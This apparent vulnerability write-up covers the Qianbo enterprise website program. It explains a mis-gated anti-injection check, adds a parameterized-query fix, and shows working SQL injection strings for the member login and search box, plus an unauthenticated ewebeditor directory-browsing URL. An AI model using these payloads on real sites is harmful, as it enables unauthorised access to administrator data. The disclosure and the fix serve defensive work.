Qianbo (Thousand Bo) enterprise website program: there is a small error in the anti-injection statement!
Details:
    If EnableStopInjection = True Then
    If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
    If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
    ' Flawed line: the condition tests Request.Cookies, but the filter is applied to Request.Form
    If Request.Cookies <> "" Then Call StopInjection2(Request.Form)
The anti-injection code is Encoded to begin with. Decoding it by echoing the decoded output shows that the check for an empty cookie is made twice here, so the Form filter depends on the Cookies test rather than on the Form itself. As a result, malicious characters can be submitted through the Form.
Proof of the vulnerability: a front-end member login of little practical value. The MD5 value is that of 1; the statement below goes in the user name field and the password is 1.
'UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where "='
This low-value front-end login only gets as far as line 48 of MemberLogin.asp:
    If UCase(LoginName) = UCase(MemName) And LoginPassword = Password
LoginName holds the statement string itself, while the user name returned by the query is 1, so execution gets stuck here.
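A hardened form of the guard and of the member lookup discussed above, as an added example that is not the vendor's code. It assumes `conn` is an open ADODB.Connection; the function name `FindMember`, the table name `MemberTable` and the column names are hypothetical placeholders.

```vbscript
<%
' Added example, not the product's own code.
' 1) Gate each filter on the collection it actually inspects.
If EnableStopInjection = True Then
    If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
    If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
    ' Was "If Request.Cookies <> ...": Form input must be tested on its own.
    If Request.Form <> "" Then Call StopInjection2(Request.Form)
End If

' 2) Keyword filtering is only a backstop. Bind the user name as a
'    parameter so it is never parsed as part of the SQL text.
Const adCmdText = 1, adVarWChar = 202, adParamInput = 1

' Hypothetical helper: returns a Recordset for the member row.
' MemberTable, MemName and [Password] are assumed names.
Function FindMember(conn, loginName)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT MemName, [Password] FROM MemberTable WHERE MemName = ?"
    ' Left() keeps the value within the declared parameter size.
    cmd.Parameters.Append cmd.CreateParameter("name", adVarWChar, adParamInput, 50, Left(loginName, 50))
    Set FindMember = cmd.Execute
End Function
%>
```

With the value bound as a parameter, a quote or UNION keyword in the user name field is compared as literal text against MemName instead of changing the query.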
http://www.xxxx.com/system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE
The back-end ewebeditor does no permission verification, so visitors can browse it directly.
FCK can also list directories; local testing showed this even on their FCK.
In the search box, enter:
%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='
A bunch of low-value bugs.
As for the various fixes, you know what to do!!!